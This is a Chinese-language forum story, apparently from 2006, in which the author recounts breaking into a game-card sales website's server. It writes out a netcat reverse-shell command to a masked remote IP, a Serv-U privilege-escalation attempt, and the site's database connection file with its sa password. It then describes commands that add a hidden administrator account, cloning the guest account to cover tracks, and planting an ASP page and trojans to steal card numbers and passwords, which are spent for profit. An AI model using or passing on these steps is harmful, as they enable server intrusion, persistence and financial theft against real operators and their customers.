| 黑客与网管的30天的较量(四) |
| 作者:世界末日 来源:中华盾 加入时间:2006-3-21 www.cnitrc.com |
|
尝试了一下几个端口连接,最后确定,3721是真正的终端端口,小样还是win2003系统。hhoo.
马上提升权限,问小刀借了个serv-u5.2版本以下的Serv-U本地权限提升程序和一个nc.exe
(小刀评论:对Serv-u6.0也通用)
先反弹回来一个shell,在对方系统上输入d:\www\wwwroot\nc.exe -e cmd.exe xxx.xxx.xxx.xxx 4321
在本机c:\nc.exe -vv -l -p 4321
shell马上就回来了,执行提升命令,d:\www\wwwroot\servulocal.exe "d:\www\wwwroot\nc.exe
-l -p 99 -e cmd.exe"
不过,很抱谦,执行不成功,为啥?因为他的FTP不存在漏洞,补丁早打了,Faint!
接着回去他的卡站目录,查看一下CONN.ASP文件(通常网站连接数据库都用此文件名),内容如下:
Session.Timeout=115
if request("b_rules")=1 then
Response.Buffer = True
else
Response.Buffer = True
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
end if
sitetitle=" - 点卡在线销售系统"
dim conn
dim connstr
on error resume next
connstr = "driver={sql server};server=localhost;uid=sa;pwd=XXXwoaini;database=cardsbuy;"
set conn=server.createobject("ADODB.CONNECTION")
if err.number<>0 then
err.clear
set conn=nothing
response.write "数据库连接出错!"
Response.End
else
conn.open connstr
if err then
err.clear
set conn=nothing
response.write "数据库连接出错!"
Response.End
end if
end if
sub endConnection()
conn.close
set conn=nothing
end sub
##############################
看到这里我不禁笑了出来,数据库用SA连接。管理员还真TMD可爱呀,嗯,他不小心,偶开心。hoho..
马上找出SQLexec (一个远程的SQL连接工具),填上用户,密码,连接成功。
打入命令
net user shijimori hack /add
命令成功完成。
net localgroup administrators shijiemori /add
命令成功完成。
(小刀评论:偶更喜欢用蓝芒的那个SQLTOOLS)
马上连接对方的终端,填表上用户,密码,OK,进去鸟,哈哈......
习惯性第一件事要做的,克隆一下guest帐号(克隆帐号的方法可去www.cnsu.org找“克隆管理员帐号就可获得相关资料),然后注销,用guest登陆,删掉刚才那个用户的登陆记录及用户。
打开他的SQL企业管理器,所有的帐号马上逞现在眼前,嘿嘿嘿,先把他的SQL数据库备份一下,然后拉回本地,在本地装个SQL数据库,再把他的数据库还原到本地,这下子轻松多了。
不过,他的密码是MD5加密的,想用他们客户的帐号进去买东西,还得一个一个改MD5密码,昏,麻烦。
后来便写了一个专门读卡的小小ASP页面,放上去,直接显示卡号密码,爽。。留了几个ASP木马,冲了几十个QB。
这时候也差不多到时间下班了,嗯。擦擦屁股走人先.....
这样,读卡页面一直用,过了7天.....
 |
|
|
未经书面授权严禁转载和复制本站的任何招聘信息和文章